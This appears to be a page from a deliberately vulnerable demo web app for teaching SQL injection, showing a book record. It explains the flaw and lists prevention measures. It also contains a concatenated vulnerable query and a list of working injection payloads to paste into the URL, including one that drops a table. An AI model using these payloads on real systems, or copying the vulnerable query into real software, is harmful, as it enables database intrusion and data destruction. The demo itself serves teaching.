Book Details - SQL Injection Demo
SQL Injection is a code injection technique where malicious SQL statements are inserted into application entry points, allowing attackers to interfere with database queries.
How SQL Injection Works:
When user input is directly concatenated into SQL queries without proper sanitization:
# Vulnerable query example:
SELECT * FROM Books WHERE Id = '" + userInput + "'
# If user enters: 1' OR '1'='1
# Final query becomes:
SELECT * FROM Books WHERE Id = '1' OR '1'='1'
Try These SQL Injection Payloads in the URL:
Replace the book ID in the URL with these payloads:
# Basic boolean-based injection
1' OR '1'='1
1' OR 1=1 --
1' OR 1=1 #
# Union-based injection
1' UNION SELECT 1,2,3,4,5 --
1' UNION SELECT null,@version,null,null,null --
# Time-based blind injection
1' AND (SELECT COUNT(*) FROM sysobjects) > 0 WAITFOR DELAY '00:00:05' --
# Error-based injection
1' AND 1=CONVERT(int, (SELECT @version)) --
# Comment out rest of query
1'; DROP TABLE Books; --
1'/**/OR/**/1=1--
SQL Injection Prevention:
- Parameterized Queries: Use SQL parameters instead of string concatenation
- Stored Procedures: Use properly implemented stored procedures
- Input Validation: Validate and sanitize all user input
- Escape Special Characters: Properly escape SQL special characters
- Least Privilege: Use database accounts with minimal permissions
- ORM Framework: Use Entity Framework or similar ORMs
Test This Vulnerability:
Try modifying the ID parameter in the URL: /Books/Details/{payload}
- Title
- The Expanse: Leviathan Wakes
- Author
- James S.A. Corey
- Published Date
- 06/02/2011
- ISBN
- 978-0316129084
- Price
- ¤11.49